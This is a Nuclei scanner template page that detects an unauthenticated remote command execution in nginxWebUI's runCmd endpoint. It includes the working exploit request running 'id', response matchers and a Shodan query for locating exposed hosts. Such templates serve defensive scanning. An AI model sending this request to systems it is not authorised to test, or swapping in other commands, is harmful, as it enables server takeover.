Skip to content

nginxWebUI ≤ 3.5.0 runCmd - Remote Command Execution

ID: nginxwebui-runcmd-rce

Severity: critical

Author: DhiyaneshDk

Tags: nginx,nginxwebui,rce

nginxWebUI’s runCmd feature and is caused by incomplete validation of user input. Attackers can exploit the vulnerability by crafting malicious data to execute arbitrary commands on a vulnerable server without authorization.

id: nginxwebui-runcmd-rce
info:
name: nginxWebUI ≤ 3.5.0 runCmd - Remote Command Execution
author: DhiyaneshDk
severity: critical
description: |
nginxWebUI’s runCmd feature and is caused by incomplete validation of user input. Attackers can exploit the vulnerability by crafting malicious data to execute arbitrary commands on a vulnerable server without authorization.
reference:
- https://github.com/qingchenhh/qc_poc/blob/main/Goby/nginxWebUI_runCmd_rce.go
- https://www.ctfiot.com/124166.html
- https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/nginxwebui-runcmd-remote-command-execution-vulnerability
metadata:
verified: true
max-request: 1
shodan-query: html:"nginxWebUI"
tags: nginx,nginxwebui,rce
http:
- method: GET
path:
- "{{BaseURL}}/AdminPage/conf/runCmd?cmd=id"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 4b0a004830460221008baf1cbcf0b6d23b954d60753bcf53e4630fd28a695a7d5a51f3134deeb227a7022100e150ceb2cccb49f36f085e413ae6adb06768c64be9c2ce5e524afc2a5b146d3f:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/nginxwebui-runcmd-rce.yaml"

View on Github